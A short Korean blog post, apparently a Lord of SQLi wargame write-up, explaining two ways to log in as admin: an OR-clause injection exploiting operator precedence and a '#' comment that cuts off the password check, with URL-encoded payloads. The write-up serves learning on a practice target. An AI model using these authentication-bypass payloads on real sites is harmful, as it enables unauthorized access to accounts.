-
반응형
문제 문제를 보면 id=admin이면 풀린다. 허나 비밀번호는 md5처리 되어 id의 인자값으로만 문제를 풀어야 한다.
이 문제의 경우 2개의 풀이 방법이 있다.
하나는 id=admin 뒤에 or 구문만 써주면 된다.
또 다른 하나는 뒤에있는 pw를 주석 처리하면 된다.
1번째 방법은 true or false and false == true를 이용한 방법이다. 참고로 true or true and false도 똑같다.
URL: ?id=admin%27%20or%20%271%27=%272
id='admin' or '1'='2' and pw=md5('')
2번째 방법은 뒤에 pw부분을 주석처리 해버리는 것이다.
URL: ?id=admin%27%23
id=admin'#
참고:#를 %23으로 바꿔서 풀어야 한다.
반응형'웹해킹' 카테고리의 다른 글
LOS-darkelf (0) 2023.07.01 LOS-wolfman (0) 2023.07.01 LOS-orc (0) 2023.07.01 LOS-goblin (0) 2023.07.01 LOS-gremlin (0) 2023.06.30 댓글
메모장
내가 보고 내가 참고하기 위해서 만든 블로그
